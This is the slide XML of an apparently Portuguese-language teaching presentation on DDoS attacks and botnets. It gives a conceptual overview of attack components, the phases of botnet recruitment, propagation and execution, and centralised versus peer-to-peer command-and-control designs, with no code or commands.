        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6143625" y="614362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Referências bibliográficas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Shape 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6810561" y="6372225"/>
            <a:ext cx="1295028" cy="2571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6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67711" y="6447234"/>
            <a:ext cx="100013" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Text 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7024092" y="6443663"/>
            <a:ext cx="109578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contato@exemplo.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Shape 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="7000875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67" name="Text 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="7086600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68" name="Text 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8357797" y="7086600"/>
            <a:ext cx="5718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14/14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39747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de um Ataque DDoS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Componentes e fases de um ataque distribuído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285750" y="1457325"/>
            <a:ext cx="86439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Componentes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285750" y="1800225"/>
            <a:ext cx="1714500" cy="1353741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82266" y="1914525"/>
            <a:ext cx="321469" cy="367903"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EF444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91" y="2000250"/>
            <a:ext cx="150019" cy="1714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01619" y="2368153"/>
            <a:ext cx="5541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Atacante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400050" y="2596753"/>
            <a:ext cx="15573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Orquestra o ataque, define alvos e controla a infraestrutura</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2571750" y="1800225"/>
            <a:ext cx="1714500" cy="1353741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3257550" y="1914525"/>
            <a:ext cx="342900" cy="367903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2000250"/>
            <a:ext cx="171450" cy="1714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93873" y="2368153"/>
            <a:ext cx="9416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Servidores C&amp;C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2686050" y="2596753"/>
            <a:ext cx="15573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Comando e Controle - gerencia a botnet e distribui comandos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Shape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4857750" y="1800225"/>
            <a:ext cx="1714500" cy="1353741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5522119" y="1914525"/>
            <a:ext cx="385763" cy="367903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44" y="2000250"/>
            <a:ext cx="214313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534062" y="2368153"/>
            <a:ext cx="43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Botnet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4972050" y="2596753"/>
            <a:ext cx="15573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 de dispositivos comprometidos (bots/zumbis) que executam o ataque</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Shape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7143750" y="1800225"/>
            <a:ext cx="1714500" cy="1353741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850981" y="1914525"/>
            <a:ext cx="300038" cy="367903"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2563EB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706" y="2000250"/>
            <a:ext cx="128588" cy="17145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829494" y="2368153"/>
            <a:ext cx="4144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Vítima</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7258050" y="2596753"/>
            <a:ext cx="15573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Alvo do ataque - servidor, aplicação ou infraestrutura de rede</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="3368278"/>
            <a:ext cx="86439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Fases do Ataque</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Shape 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="3711178"/>
            <a:ext cx="8572500" cy="1028700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3A6EA5">
              <a:alpha val="15000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Shape 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="3825478"/>
            <a:ext cx="228600" cy="2286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3" name="Text 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="482566" y="3854053"/>
            <a:ext cx="1350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34" name="Text 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714375" y="3839766"/>
            <a:ext cx="103207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Recrutamento</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Text 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714375" y="4111228"/>
            <a:ext cx="8101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Construção da botnet através da exploração de vulnerabilidades</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Shape 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714375" y="4368403"/>
            <a:ext cx="2619356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37" name="Text 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="4439841"/>
            <a:ext cx="94939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Random Scanning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Text 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1649481" y="4439841"/>
            <a:ext cx="104993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Sonda IPs aleatórios</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3419456" y="4368403"/>
            <a:ext cx="2619384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40" name="Text 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3476606" y="4439841"/>
            <a:ext cx="82716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Hitlist Scanning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Text 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4232337" y="4439841"/>
            <a:ext cx="99979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Lista pré-compilada</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Shape 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6124566" y="4368403"/>
            <a:ext cx="2619356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43" name="Text 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6181716" y="4439841"/>
            <a:ext cx="113281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Permutation Scanning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Text 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7243093" y="4439841"/>
            <a:ext cx="120009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Coordenação entre bots</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788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991" y="4889897"/>
            <a:ext cx="150019" cy="171450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Shape 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="5225653"/>
            <a:ext cx="8572500" cy="1028700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3A6EA5">
              <a:alpha val="15000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Shape 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="5339953"/>
            <a:ext cx="228600" cy="2286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8" name="Text 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="482566" y="5368528"/>
            <a:ext cx="1350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49" name="Text 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714375" y="5354241"/>
            <a:ext cx="163547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Propagação e Controle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Text 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714375" y="5625703"/>
            <a:ext cx="8101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Instalação do malware e estabelecimento de comunicação com C&amp;C</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Shape 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714375" y="5882878"/>
            <a:ext cx="2619356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52" name="Text 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="5954316"/>
            <a:ext cx="78285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 Source</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Text 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1482942" y="5954316"/>
            <a:ext cx="142230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Download de servidor central</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Shape 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3419456" y="5882878"/>
            <a:ext cx="2619384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55" name="Text 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3476606" y="5954316"/>
            <a:ext cx="75503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Back-chaining</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Text 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4160202" y="5954316"/>
            <a:ext cx="158373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Download da máquina infectante</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Shape 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6124566" y="5882878"/>
            <a:ext cx="2619356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58" name="Text 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6181716" y="5954316"/>
            <a:ext cx="68808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Autonomous</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Text 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6798366" y="5954316"/>
            <a:ext cx="162793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Código completo no próprio worm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6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991" y="6404372"/>
            <a:ext cx="150019" cy="171450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Shape 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="6740128"/>
            <a:ext cx="8572500" cy="1028700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3A6EA5">
              <a:alpha val="15000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Shape 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="6854428"/>
            <a:ext cx="228600" cy="22860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63" name="Text 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="482566" y="6883003"/>
            <a:ext cx="1350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64" name="Text 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714375" y="6868716"/>
            <a:ext cx="147144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Execução do Ataque</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Text 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714375" y="7140178"/>
            <a:ext cx="8101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Lançamento coordenado do ataque contra o alvo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Shape 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714375" y="7397353"/>
            <a:ext cx="3971925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67" name="Text 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="7468791"/>
            <a:ext cx="62519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IP Spoofing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Text 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325277" y="7468791"/>
            <a:ext cx="176146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Falsificação de endereços de origem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Shape 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772025" y="7397353"/>
            <a:ext cx="3971925" cy="257175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="374151">
              <a:alpha val="30000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Text 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4829175" y="7468791"/>
            <a:ext cx="74950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Sincronização</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Text 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5507245" y="7468791"/>
            <a:ext cx="197848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Ataque coordenado em horário específico</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Shape 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="8054578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73" name="Text 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="8140303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74" name="Text 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8413412" y="8140303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2/14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543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Botnets: O Exército Zumbi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infraestrutura por trás dos ataques DDoS modernos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4200525" cy="14859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14859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" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="1571625"/>
            <a:ext cx="4043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que é uma Botnet?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0050" y="1885950"/>
            <a:ext cx="40433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Rede de dispositivos comprometidos (bots/zumbis) controlados remotamente por um atacante (botmaster) através de servidores de Comando e Controle (C&amp;C).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00050" y="2486025"/>
            <a:ext cx="4043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Podem incluir servidores, computadores pessoais, roteadores, câmeras IP, dispositivos IoT e qualquer dispositivo conectado vulnerável.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285750" y="311467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Arquiteturas de Comando e Controle (C&amp;C)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="3429000"/>
            <a:ext cx="2043113" cy="33289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00050" y="3543300"/>
            <a:ext cx="188572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Centralizada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1092882" y="4186238"/>
            <a:ext cx="428625" cy="428625"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E53E3E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70" y="4314825"/>
            <a:ext cx="171450" cy="171450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584309" y="5022056"/>
            <a:ext cx="357188" cy="357188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6" y="5114925"/>
            <a:ext cx="214313" cy="171450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 rot="7620000">
            <a:off x="757193" y="4403408"/>
            <a:ext cx="555717" cy="73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947161" y="5022056"/>
            <a:ext cx="357188" cy="357188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98" y="5114925"/>
            <a:ext cx="214313" cy="17145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 rot="6240000">
            <a:off x="1118841" y="4405961"/>
            <a:ext cx="195285" cy="729160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25" name="Shape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1310013" y="5022056"/>
            <a:ext cx="357188" cy="357188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451" y="5114925"/>
            <a:ext cx="214313" cy="171450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 rot="4560000">
            <a:off x="1300264" y="4405961"/>
            <a:ext cx="195285" cy="729160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28" name="Shape 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1672865" y="5022056"/>
            <a:ext cx="357188" cy="357188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303" y="5114925"/>
            <a:ext cx="214313" cy="171450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 rot="3180000">
            <a:off x="1301480" y="4403408"/>
            <a:ext cx="555717" cy="73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5904309"/>
            <a:ext cx="100013" cy="100013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57213" y="5900738"/>
            <a:ext cx="117202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Simples de implementar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody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" y="6104334"/>
            <a:ext cx="100013" cy="100013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57213" y="6100763"/>
            <a:ext cx="75522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Controle direto</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody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" y="6304359"/>
            <a:ext cx="62508" cy="100013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19708" y="6300788"/>
            <a:ext cx="101117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Ponto único de falha</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody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50" y="6504384"/>
            <a:ext cx="62508" cy="100013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19708" y="6500813"/>
            <a:ext cx="104421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Mais fácil de detectar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Shape 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2442939" y="3429000"/>
            <a:ext cx="2043336" cy="33289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0" name="Text 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2557463" y="3543300"/>
            <a:ext cx="1885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Descentralizada (P2P)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Shape 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3939053" y="4439841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4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2631" y="4514850"/>
            <a:ext cx="214313" cy="171450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Shape 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="7200000">
            <a:off x="3776066" y="4604147"/>
            <a:ext cx="329907" cy="557129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44" name="Shape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="9000000">
            <a:off x="3143613" y="4601532"/>
            <a:ext cx="959746" cy="56235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45" name="Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3621518" y="5046111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4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5097" y="5121120"/>
            <a:ext cx="214313" cy="171450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Shape 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3147185" y="5206845"/>
            <a:ext cx="635068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48" name="Shape 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-9000000">
            <a:off x="2826079" y="4657817"/>
            <a:ext cx="959746" cy="56235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49" name="Shape 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2986422" y="5046111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5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0000" y="5121120"/>
            <a:ext cx="214313" cy="171450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Shape 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-7200000">
            <a:off x="2823436" y="4660432"/>
            <a:ext cx="329907" cy="557129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2" name="Shape 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="3140013" y="4114019"/>
            <a:ext cx="14288" cy="1099970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3" name="Shape 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2668888" y="4439841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5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2466" y="4514850"/>
            <a:ext cx="214313" cy="171450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Shape 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-3600000">
            <a:off x="2823436" y="4054162"/>
            <a:ext cx="329907" cy="557129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6" name="Shape 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-1800000">
            <a:off x="2826051" y="4051547"/>
            <a:ext cx="959746" cy="56235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7" name="Shape 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2986422" y="3833543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5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0000" y="3908552"/>
            <a:ext cx="214313" cy="171450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Shape 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3147157" y="3994277"/>
            <a:ext cx="635068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60" name="Shape 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1800000">
            <a:off x="3143585" y="3995234"/>
            <a:ext cx="959746" cy="56235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61" name="Shape 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3621518" y="3833543"/>
            <a:ext cx="321469" cy="321469"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3182CE"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6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5097" y="3908552"/>
            <a:ext cx="214313" cy="171450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Shape 45"/>
